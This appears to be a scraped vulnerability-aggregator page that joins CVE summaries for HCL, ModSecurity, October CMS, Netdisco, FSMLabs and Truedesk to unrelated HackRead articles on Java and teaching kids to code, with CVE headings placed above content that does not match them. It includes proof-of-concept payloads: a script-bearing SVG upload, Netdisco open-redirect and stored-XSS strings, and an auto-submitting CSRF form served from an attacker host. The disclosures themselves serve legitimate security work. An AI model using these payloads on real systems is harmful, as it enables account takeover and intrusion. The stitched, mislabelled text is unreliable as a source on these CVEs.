HCL BigFix Mobile is vulnerable to a command injection attack. An authenticated attacker could run arbitrary shell commands on the WebUI server.


 

 Loading...

Skip to page contentSkip to chat

Skip to page contentSkip to chat

CVE-2023-28012: Knowledge Article View HCL - Customer Support

By Owais Sultan
Are you considering developing a Java web application? While you may have the skills to do it yourself,…
This is a post from HackRead.com Read the original post: Benefits of hiring a Java web application development company

Are you considering developing a Java web application? While you may have the skills to do it yourself, have you considered the benefits of hiring a professional Java web application development company?

Java is one of the most widely used programming languages for web application development. Developing a high-quality, efficient, and secure Java web application requires expertise and knowledge of the latest technologies and best practices. Hiring a professional Java web application development company can ensure that your project is completed successfully and meets your specific requirements.

In today’s competitive digital landscape, having a well-designed and functional web application is crucial for the success of your business. Hiring a Java web application development company can provide you with numerous benefits, including access to a team of experienced developers, cost and time efficiency, and the ability to focus on your core business activities.

In this article, we will explore the various advantages of hiring a Java web application development company and how it can contribute to the growth and success of your business. Are you interested in web development and looking to expand your programming skills?

If so, then learning Java web application development might be the next step for you. Java is a versatile programming language that is widely used for building robust and scalable web applications. In this article, we will provide an introduction to Java web application development and guide you on how to get started in this exciting field.

*   **Understand the Basics of Java**

Before diving into web application development, it is essential to have a solid understanding of the Java programming language. Familiarize yourself with the syntax, data types, control structures, and object-oriented programming concepts. There are numerous online tutorials, courses, and books available that can help you learn the fundamentals of Java.

*   **Learn Java Servlets and JavaServer Pages (JSP)**

Java Servlets and JSP are the building blocks of Java web applications. Servlets are Java classes that handle HTTP requests and generate responses, while JSP allows you to create dynamic web pages by embedding Java code within HTML. Mastering these technologies will enable you to create interactive and dynamic web applications.

*   **Choose a Development Framework**

To streamline the development process and enhance productivity, it is recommended to use a Java web development framework. Some popular frameworks include Spring MVC, JavaServer Faces (JSF), and Apache Struts. These frameworks provide a set of libraries, tools, and best practices that simplify web application development and promote code reusability.

*   **Set Up a Development Environment**

To start building Java web applications, you need to set up a development environment. Install Java Development Kit (JDK) and an Integrated Development Environment (IDE) such as Eclipse, IntelliJ IDEA, or NetBeans. These tools provide a user-friendly interface, code editor, and debugging features that facilitate the development process.

In today’s digital age, security is of utmost importance, especially when it comes to web applications. With the increasing number of cyber threats and data breaches, implementing secure authentication and authorization in Java web applications has become a necessity. This article will guide you through the steps to ensure that your Java web application is protected and only accessible to authorized users.

**Understand the Basics of Authentication and Authorization.** Authentication is the process of verifying the identity of a user, while authorization determines what actions and resources a user is allowed to access. It is crucial to have a clear understanding of these concepts before implementing security measures in your Java for web development. 

**Use a Secure Password Storage Mechanism.** One of the most common security vulnerabilities is storing passwords in plain text. Instead, use a secure password storage mechanism, such as hashing algorithms like bcrypt or PBKDF2, to store passwords securely. These algorithms convert passwords into irreversible hashes, making it difficult for attackers to retrieve the original password.

**Implement Two-Factor Authentication (2FA).** Two-factor authentication adds an extra layer of security by requiring users to provide two separate forms of identification, typically a password and a one-time code sent to their mobile device. Implementing 2FA can significantly enhance the security of your Java web application and protect against unauthorized access.

Benefits of hiring a Java web application development company

HCL Verse is susceptible to a Reflected Cross Site Scripting (XSS) vulnerability.  By tricking a user into entering crafted markup a remote, unauthenticated attacker could execute script in a victim's web browser to perform operations as the victim and/or steal the victim's cookies, session tokens, or other sensitive information.


CVE-2023-28013: Knowledge Article View HCL - Customer Support

By Waqas
Why Coding for Kids is Vital – Importance & Benefits Explained! In an era dominated by rapid technological…
This is a post from HackRead.com Read the original post: Empowering Future Minds: The Indispensable Role of Coding for Kids

**Why Coding for Kids is Vital – Importance & Benefits Explained!**

In an era dominated by **rapid technological advancements**, the clamour for equipping the next generation with essential skills is louder than ever. Amidst this digital renaissance, an educational revolution is taking place, with an increasing number of voices advocating for coding to be an integral part of every child’s learning journey.

As we delve deeper into the importance of coding for kids, it becomes evident that this skill is not just about programming computers; it’s about empowering young minds to conquer the challenges of tomorrow.

**Fostering Creativity and Problem-Solving Skills**

Coding, at its core, is a language of innovation. It encourages creativity, turning abstract ideas into concrete reality. By introducing kids to coding at an early age, we provide them with a unique medium to express their creativity, instilling the confidence to tackle problems head-on.

Coding is essentially problem-solving in action, and learning to code equips children with the tools to break down complex issues into manageable parts, thereby honing their critical thinking skills.

Presently, numerous websites and applications offer block-based coding lessons to kids and teenagers. Popular platforms like Thunkable and **code.org** provide tailored learning experiences, allowing you to select the most suitable resource for your needs.

**Building Resilience and Perseverance**

Coding is a process riddled with trial and error, where even the most seasoned programmers face challenges and setbacks. Teaching children to code instils resilience and perseverance in the face of adversity. As they debug errors and refine their code, they learn that failure is merely a stepping stone towards success. This invaluable lesson equips them with the mental fortitude needed to embrace challenges in any area of life.

**Enhancing Computational Thinking**

**According to** ISTE, Computational thinking is the bedrock of coding, encompassing problem decomposition, pattern recognition, abstraction, and algorithm design. When kids learn to code, they unknowingly develop and enhance their computational thinking skills. This type of thinking goes beyond coding and permeates other subjects and real-life scenarios. From mathematics to science to everyday decision-making, the ability to think computationally empowers kids to approach problems systematically and efficiently.

**Future-Proofing Career Prospects**

The job market is evolving at breakneck speed, and technology continues to disrupt traditional industries. By introducing coding into the educational landscape, we equip children with the tools to navigate the shifting job market of the future. Whether they end up as software engineers or not, the understanding of coding opens doors to a myriad of opportunities across various sectors, where digital literacy is increasingly becoming a prerequisite.

**Fostering Collaboration and Communication**

In the digital age, collaboration and communication have transcended geographical boundaries. Coding encourages teamwork, as young coders often collaborate on projects, sharing ideas and learning from one another.

Moreover, coding necessitates clear communication, as coding concepts are often conveyed through written code and explanations. These vital soft skills not only aid children in their academic endeavours but also prepare them for the interconnected global workplace.

Incorporating coding into the curriculum promotes inclusivity and diversity within the tech industry. By introducing children from all backgrounds to coding, we break down barriers and encourage participation from underrepresented groups. The more diverse the minds involved in coding, the more innovative and inclusive the solutions created will be.

In conclusion, teaching kids to code is not about creating an army of programmers, but rather about empowering them with essential skills that will serve them in any path they choose. Coding fosters creativity, problem-solving abilities, computational thinking, and collaboration – attributes that will shape these young minds into the innovators, leaders, and change-makers of tomorrow.

As educators, parents, and society as a whole, it is our collective responsibility to ensure that coding takes its rightful place in the realm of education, unlocking the full potential of future generations.

If you’re a beginner wondering **how to start coding**, there are numerous resources that can guide you through the process, suitable for all ages, not just children and teenagers. It’s essential to start with understanding the basic concepts and gradually progresses to more advanced topics. In doing so, you can build a solid foundation in coding, making it easier to pick up different programming languages and techniques in the future.

**RELATED ARTICLES**

1.  How Internet can get smarter by combining AI and ML
2.  What Programming Languages Do Ethical Hackers Use?
3.  How to Develop Complex Marketing Op with “No Code” Tools
4.  How to Teach Your Child Coding: A Gift for Their Digital Future

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Empowering Future Minds: The Indispensable Role of Coding for Kids

Trustwave ModSecurity 3.x before 3.0.10 has Inefficient Algorithmic Complexity.

ModSecurity is an open-source Web Application Firewall (WAF) engine maintained by Trustwave. This blog post discusses an issue with four transformation actions that could enable a Denial of Service (DoS) attack by a malicious actor. The issue has been addressed with fixes in v3.0.10. ModSecurity v2 is not affected. 

**Vulnerability Details**

Included in ModSecurity functionality are dozens of transformation actions which support altering the representation of values so that further processing can be done on the modified values. This may be either more convenient to work with, or less prone to rule evasion.

The ModSecurity team was recently alerted to a possible DoS issue in four of these transformations in ModSecurity v3. Thanks to the reporter for the investigation and for responsibly disclosing the issue. The affected transformations are: removeWhitespace, removeNull, replaceNull, and removeCommentsChar.

The affected transformations were functionally correct. However, the implemented solutions would be inefficient if a malicious user were to submit a specially crafted HTTP request that triggered worst-case performance.

The most dramatic delays can typically be prevented through common configuration items such as SecRequestBodyNoFilesLimit with the default value of 131072 suggested in modsecurity.conf-recommended. However, even with this limit in place, a dozen or more executions of these transformations could result in multiple seconds of delay for a single HTTP transaction. If a large enough number of such malicious requests are running simultaneously, this could render the webserver unable to respond to legitimate requests in a timely manner.

**Mitigation**

For installations where immediate upgrade to the new version of the software is impractical, some mitigation possibilities are available.

The nature of the issue results in large values causing a much greater effect on resources than numerous smaller values. A separate ModSecurity rule could be included to limit the size of each value to be processed, but still allow legitimate content to be processed unimpeded. For example, if there are many rules with the affected transformations executing against the ARGS collection, a rule such as the following could be included before other phase 2 rules:

SecRule ARGS "@gt 16000" "id:1,phase:2,t:length,deny,status:403,msg:’ARG exceeds length limit'"

Optionally, combined with further reducing the configured value for SecRequestBodyNoFilesLimit, potential delays precipitated by worst-case input can be significantly reduced.

CVE-2023-38285: ModSecurity v3: DoS Vulnerability in Four Transformations (CVE-2023-38285)

* A cross-site scripting (XSS) vulnerability in Truedesk v1.2.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into a user chat box.

CVE-2022-31455

An arbitrary file upload vulnerability in October CMS v3.4.4 allows attackers to execute arbitrary code via a crafted file.

**#Exploit Title:** October CMS v3.4.4 – Stored Cross-Site Scripting (XSS) (Authenticated)

**#Date:** 29 June 2023

**#Exploit Author:** Okan Kurtulus

**#Vendor Homepage:** https://octobercms.com

**#Version:** v3.4.4

**#Tested on:** Ubuntu 22.04

**#CVE:** 2023-37692

**#Proof of Concept:**

**1-)** Install the system through the website and log in with any user with file upload authority.

**2-)** Click on the Media menu at the top.

**3-)** Create an SVG file using the payload below.

    <?xml version="1.0" standalone="no"?>
    <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
    
    <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
      <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
      <script type="text/javascript">
        alert(1);
      </script>
    </svg>

**4-)** The XSS payload will be triggered when you call the corresponding SVG file.

**NOTE:** This security vulnerability may continue in other versions. It is recommended to disable the SVG extension for this.

CVE-2023-37692: October CMS v3.4.4 – Stored Cross-Site Scripting (XSS) (Authenticated)

Netdisco before v2.063000 was discovered to contain an open redirect vulnerability. An attacker may exploit this vulnerability to redirect users to arbitrary web URLs by tricking the victim users to click on crafted links.

**Netdisco-CVE-2023-37624****Description**

Netdisco before version 2.063000 was found to contain an open redirect vulnerability due to insufficient validation of an input parameter. An attacker may exploit this vulnerability to redirect users to arbitrary web URLs by tricking them into clicking on a specially crafted link.

**Technical Details**

If a user attempts to access a page within Netdisco without a valid session, they are redirected to the login page. Once logged in, the user will be redirected to the page they originally attempted to visit. Insufficient validation of the original url allows a malicious actor to specify an arbitrary URL in the original GET request to the login page.

To reproduce the vulnerability the following URL may be provided:

    http://netdiscoexample.host///www.google.com
    

This will redirect the user to Google after the login process is complete.

**Netdisco-CVE-2023-37623****Description**

Netdisco before version 2.063000 was found to contain multiple stored cross-site scripting (XSS) vulnerabilities. An attacker may exploit this to perform unauthorised actions on behalf of a user.

**Technical Details**

A stored Cross-Site Scripting vulnerability was discovered in the main search box of the web applicaiton. This vulnerability is the result of insufficient sanitisation of the System Name device field. When a search for a device is performed by typing in an IP address, once at least three characters are entered in the search bar matching device System Names are presented in a drop down list by the typeahead feature. If the System Name contains HTML tags, the browser will interpret the contents as valid HTML.

To reproduce the vulnerability, perform the following steps:

1.  Log in to Netdisco as an administrator.
2.  Go to the admin dropdown menu and select Pseudo Devices.
3.  Enter any IPV4 address as the Device IP (eg. 192.168.0.1), then enter the Device Name below, and click the Add button.

    <script>alert(1)</script>
    

4.  Then in the main search box containing the text "Find Anything", enter the first three numbers of the Device IP (i.e. 192).
5.  Observe that the alert box has executed.

Note: There are other ways to inject a payload into the System Name without creating a pseudo device and requiring an admin login.

For example an attacker may set up SNMP on their machine and inserts a Java Script payload as the Device Name, as in the configuration file below:

To inject the payload into Netdisco it is possible to submit a discovery request for the attacker controlled IP. This can be done by enticing an administrator with a valid session can be enticed into clicking on a link that utilises the Open Redirect vulnerability from CVE 2023-37624, for example; 'https://netdiscoexample.host///attacker.host/csrf.html', where netdiscoexample.host is the Netdisco URL and attacker.host/csrf.html hosts the following HTML:

<body onload\="document.form.submit()"\>
   <form action\="https://netdiscoexample.host/admin/discover?device=attackerIP" method\="POST" name\="form" style\="display;none;"\>
</form\>
</body\>

If the administrator clicks on this link then attacker's machine will be discovered and the payload loaded through SNMP and executed when the IP is entered in the search bar, as in the screenshot below.

An additional stored Cross-Site Scripting vulnerability was found in the Job Queue page. This vulnerability is the result of insufficient sanitisation of the Param job field.

To reproduce the vulnerability, perform the following steps:

1.  Log into Netdisco as an administrator.
2.  Go to the Inventory page and open any device. If a device is not present, then add a Pseudo Device as above.
3.  Click in the contact field and enter the following text:

    <script>alert(1)</script>
    

4.  Go to the Admin dropdown menu and select Job Queue.
5.  Esnure the job has a Status of "Done", then hover the mouse point over the Param field containing the text "<script>alert(1)</script>".
6.  Observe that the alert box has executed.

CVE-2023-37624: GitHub - benjaminpsinclair/Netdisco-2023-Advisory

An issue was discovered in FSMLabs TimeKeeper 8.0.17 through 8.0.28. By intercepting requests from various timekeeper streams, it is possible to find the getsamplebacklog call. Some query parameters are passed directly in the URL and named arg[x], with x an integer starting from 1; it is possible to modify arg[2] to insert Bash code that will be executed directly by the server.

Financial networks have been the obvious targets, and disrupting clock sync in a first responder system, automated manufacturing, power plants or in data centers, could have more significant effects. For example Google has recently identified clock synchronization methods for operating global databases  (James Corbett 2012)  and clock sync has been widely employed in data systems for decades  (Liskov 1993).

**Summary**

Clock synchronization is a key technology for operation and security of the entire US technology landscape, extending from financial markets through electric power distribution.

There are numerous, identified and not widely appreciated vulnerabilities in legacy clock synchronization technology, many of which are addressed in field tested solutions FSMLabs has deployed.

There are avenues for using clock synchronization to improve the security of sectors that do not normally utilize clock synchronization.

FSMLabs has in production, mature technologies that could be incorporated in a defense in depth protection strategy to address issues noted in the 2018 DOD Cyber Security Strategy.

FSMLabs has R&D projects that could be rapidly incorporated into existing systems.

**Bibliography**

Department of Defense. 2018. “Cyber Strategy Summary 2018.” _Department of Defense._ https://media.defense.gov/2018/Sep/18/2002041658/-1/-1/1/CYBER\_STRATEGY\_SUMMARY\_FINAL.PDF.

Dougan, Cort. 2018. Method, system, and computer program product for GNSS receiver signal health and security analysis. USA Patent 10,024,975. July 17.

Dropping, Coggins, Platt. 2018. “Timing Security: Mitigating Threats in a Changing Landscape Webinar.” _ATIS._ May 22. https://www.atis.org/wp-content/uploads/01\_news\_events/webinar-pptslides/Timing-Security5222018.pdf.

6.  _www.finra.org._ https://www.finra.org/rules-guidance/rulebooks/finra-rules/6820.

—. 2019. “Clock Sync Safety and Security in Depth.” _WSTS 2019 Talks._ https://wsts.atis.org/wp-content/uploads/sites/9/2019/03/4\_06\_FSMLabs\_Dougan\_Security\_for\_Enterprise\_in\_Depth.pdf.

—. 2017. “Smart and dumb clients and the “so-called” Best Master Clock Algorithm in PTP IEEE 1588.” _medium.com/fsmlabs._ April 21. https://medium.com/fsmlabs/smart-and-dumb-clients-and-the-so-called-best-master-clock-algorithm-in-ptp-ieee-1588-6739608d4cff.

Humphreys, Todd E., et al. 2008. “”Assessing the spoofing threat: Development of a portable GPS civilian spoofer.”.” _Radionavigation laboratory conference proceedings._

James Corbett, Jeffrey Dean, Michael Epstein, Andrew Fikes, Christopher Frost, J. J. Furman, Sanjay Ghemawat, Andrey Gubarev, Christopher Heiser, Peter Hochschild, Wilson Hsieh, Sebastian Kanthak, Eugene Kogan, Hongyi Li, Alexander Lloyd, Sergey Melnik,. 2012. “Spanner: Google’s globally-distributed database.” _Proceedings of the 10th USENIX Conference on Operating Systems Design and Implementation._ USENIX.

Liskov, Barbara. 1993. “Practical uses of synchronized clocks in distributed systems.” _Distributed Computing_ 211-219.

Timms, Aaron. 2015. “Y2K.00001: Markets Take a Leap Second Into the Void.” _Institutional Investor._ June 30. https://www.institutionalinvestor.com/article/b14z9ydlpr8hln/y2k00001-markets-take-a-leap-second-into-the-void.

Yodaiken, Cort Dougan and Victor. 2017. Method, time consumer system, and computer program product for maintaining accurate time on an ideal clock. USA Patent 9,671,761. June 6.

Yodaiken, Victor. 2014. Systems and methods for detecting a security breach in a computer system. USA Patent 8,793,794. July 29.

—. 2015. “The Enterprise Profile for PTP and TimeKeeper.” _www.yodaiken.com._ October 1.

CVE-2023-31465: FSMLabs Cybersecurity - FSMLabs

A cross-site scripting (XSS) vulnerability in Truedesk v1.2.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the team name parameter.

Tag

#web